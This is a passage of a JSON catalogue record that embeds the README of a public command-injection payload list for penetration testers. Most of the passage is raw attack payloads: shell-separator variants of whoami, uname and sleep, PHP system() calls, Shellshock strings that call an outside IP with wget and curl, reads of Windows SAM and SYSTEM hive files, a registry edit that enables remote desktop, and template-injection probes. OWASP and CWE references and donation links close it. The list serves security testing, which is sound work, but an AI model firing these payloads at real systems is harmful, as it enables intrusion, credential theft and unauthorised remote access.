XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\");?\u003e\n\u003c?php system(\"sleep 10\");?\u003e\n\u003c?php system(\"sleep 5\");?\u003e\n\u003c?php system(\"wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get\");?\u003e\n\u003c?php system(\"wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc\");?\u003e\n:phpversion();\n`ping 127.0.0.1`\n\u0026 ping -i 30 127.0.0.1 \u0026\n\u0026 ping -n 30 127.0.0.1 
\u0026\n;${@print(md5(RCEVulnerable))};\n${@print(\"RCEVulnerable\")}\n${@print(system($_SERVER['HTTP_USER_AGENT']))}\npwd\n| pwd\n; pwd\n\u0026 pwd\n\u0026\u0026 pwd\n\\r\n| reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n; reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\u0026 reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\u0026\u0026 reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\\r\\n\nroute\n| sleep 1\n; sleep 1\n\u0026 sleep 1\n\u0026\u0026 sleep 1\nsleep 1\n|| sleep 10\n| sleep 10\n; sleep 10\n{${sleep(10)}}\n\u0026 sleep 10 \n\u0026\u0026 sleep 10\nsleep 10\n|| sleep 15\n| sleep 15\n; sleep 15\n\u0026 sleep 15 \n\u0026\u0026 sleep 15\n {${sleep(20)}}\n{${sleep(20)}}\n {${sleep(3)}}\n{${sleep(3)}}\n| sleep 5\n; sleep 5\n\u0026 sleep 5\n\u0026\u0026 sleep 5\nsleep 5\n {${sleep(hexdec(dechex(20)))}} \n{${sleep(hexdec(dechex(20)))}} \nsysinfo\n| sysinfo\n; sysinfo\n\u0026 sysinfo\n\u0026\u0026 sysinfo\nsystem('cat C:\\boot.ini');\nsystem('cat config.php');\n|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');\n| system('curl https://crowdshield.com/.testing/rce_vuln.txt');\n; system('curl https://crowdshield.com/.testing/rce_vuln.txt');\n\u0026 system('curl https://crowdshield.com/.testing/rce_vuln.txt');\n\u0026\u0026 system('curl https://crowdshield.com/.testing/rce_vuln.txt');\nsystem('curl https://crowdshield.com/.testing/rce_vuln.txt')\nsystem('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')\nsystem('curl https://xerosecurity.com/.testing/rce_vuln.txt');\nsystem('echo 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\nsysteminfo\n| systeminfo\n; systeminfo\n\u0026 systeminfo\n\u0026\u0026 systeminfo\nsystem('ls')\nsystem('pwd')\nsystem('pwd');\n|| system('sleep 5');\n| system('sleep 5');\n; system('sleep 5');\n\u0026 system('sleep 5');\n\u0026\u0026 system('sleep 5');\nsystem('sleep 5')\nsystem('sleep 5');\nsystem('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')\nsystem('wget https://xerosecurity.com/.testing/rce_vuln.txt');\nsystem('whoami')\nsystem('whoami');\ntest*; ls -lhtR 
/var/www/\ntest* || perl -e 'print \"X\"x16096'\ntest* | perl -e 'print \"X\"x16096'\ntest* \u0026 perl -e 'print \"X\"x16096'\ntest* \u0026\u0026 perl -e 'print \"X\"x16096'\ntest*; perl -e 'print \"X\"x16096'\n$(`type C:\\boot.ini`)\n\u0026\u0026type C:\\\\boot.ini\n| type C:\\Windows\\repair\\SAM\n; type C:\\Windows\\repair\\SAM\n\u0026 type C:\\Windows\\repair\\SAM\n\u0026\u0026 type C:\\Windows\\repair\\SAM\ntype C:\\Windows\\repair\\SAM\n| type C:\\Windows\\repair\\SYSTEM\n; type C:\\Windows\\repair\\SYSTEM\n\u0026 type C:\\Windows\\repair\\SYSTEM\n\u0026\u0026 type C:\\Windows\\repair\\SYSTEM\ntype C:\\Windows\\repair\\SYSTEM\n| type C:\\WINNT\\repair\\SAM\n; type C:\\WINNT\\repair\\SAM\n\u0026 type C:\\WINNT\\repair\\SAM\n\u0026\u0026 type C:\\WINNT\\repair\\SAM\ntype C:\\WINNT\\repair\\SAM\ntype C:\\WINNT\\repair\\SYSTEM\n| type %SYSTEMROOT%\\repair\\SAM\n; type %SYSTEMROOT%\\repair\\SAM\n\u0026 type %SYSTEMROOT%\\repair\\SAM\n\u0026\u0026 type %SYSTEMROOT%\\repair\\SAM\ntype %SYSTEMROOT%\\repair\\SAM\n| type %SYSTEMROOT%\\repair\\SYSTEM\n; type %SYSTEMROOT%\\repair\\SYSTEM\n\u0026 type %SYSTEMROOT%\\repair\\SYSTEM\n\u0026\u0026 type %SYSTEMROOT%\\repair\\SYSTEM\ntype %SYSTEMROOT%\\repair\\SYSTEM\nuname\n;uname;\n| uname -a\n; uname -a\n\u0026 uname -a\n\u0026\u0026 uname -a\nuname -a\n|/usr/bin/id\n;|/usr/bin/id|\n;/usr/bin/id|\n$;/usr/bin/id\n() { :;};/usr/bin/perl -e 'print \\\"Content-Type: text/plain\\\\r\\\\n\\\\r\\\\nXSUCCESS!\\\";system(\\\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\\\");'\n() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11\n| wget http://crowdshield.com/.testing/rce.txt\n\u0026 wget http://crowdshield.com/.testing/rce.txt\n; wget https://crowdshield.com/.testing/rce_vuln.txt\n$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)\n\u0026\u0026 wget https://crowdshield.com/.testing/rce_vuln.txt\nwget 
https://crowdshield.com/.testing/rce_vuln.txt\n$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)\nwhich curl\nwhich gcc\nwhich nc\nwhich netcat\nwhich perl\nwhich python\nwhich wget\nwhoami\n| whoami\n; whoami\n' whoami\n' || whoami\n' \u0026 whoami\n' \u0026\u0026 whoami\n'; whoami\n\" whoami\n\" || whoami\n\" | whoami\n\" \u0026 whoami\n\" \u0026\u0026 whoami\n\"; whoami\n$(`whoami`)\n\u0026 whoami\n\u0026\u0026 whoami\n{{ get_user_file(\"C:\\boot.ini\") }}\n{{ get_user_file(\"/etc/hosts\") }}\n{{4+4}}\n{{4+8}}\n{{person.secret}}\n{{person.name}}\n{1} + {1}\n{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}\n{{[] .__ Class __.__ base __.__ subclasses __ ()}}\n```\n\n#### References :\n\n###### Testing for Command Injection (OTG-INPVAL-013)\n\n* 👉 https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)\n\n###### OWASP Command Injection\n\n* 👉 https://www.owasp.org/index.php/Command_Injection\n\n###### CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')\n\n* 👉 http://cwe.mitre.org/data/definitions/77.html\n\n###### CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\n\n* 👉 http://cwe.mitre.org/data/definitions/78.html\n\n###### PortSwigger Web Security - OS Command Injection\n\n* 👉 https://portswigger.net/kb/issues/00100100_os-command-injection\n\n### Cloning an Existing Repository ( Clone with HTTPS )\n```\nroot@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/command-injection-payload-list.git\n```\n\n### Cloning an Existing Repository ( Clone with SSH )\n```\nroot@ismailtasdelen:~# git clone git@github.com:ismailtasdelen/command-injection-payload-list.git\n```\n\n##### Donate!\n\nSupport the authors:\n\n##### PayPal:\n\nhttps://paypal.me/ismailtsdln\n\n##### LiberaPay:\n\n\u003cnoscript\u003e\u003ca href=\"https://liberapay.com/ismailtasdelen/donate\"\u003e\u003cimg alt=\"Donate using Liberapay\" 
src=\"https://liberapay.com/assets/widgets/donate.svg\"\u003e\u003c/a\u003e\u003c/noscript\u003e\n","funding_links":["https://liberapay.com/ismailtasdelen","https://paypal.me/ismailtsdln","https://liberapay.com/ismailtasdelen/donate"],"categories":["Introduction","Others","\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"783f861b9f822127dba99acb55687cbb\"\u003e\u003c/a\u003e工具","Pentesting"],"sub_categories":["Command Injection","\u003ca id=\"80301821d0f5d8ec2dd3754ebb1b4b10\"\u003e\u003c/a\u003ePayload\u0026\u0026远控\u0026\u0026RAT","\u003ca id=\"b5d99a78ddb383c208aae474fc2cb002\"\u003e\u003c/a\u003ePayload收集","Payloads"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpayloadbox%2Fcommand-injection-payload-list","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpayloadbox%2Fcommand-injection-payload-list","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpayloadbox%2Fcommand-injection-payload-list/lists"}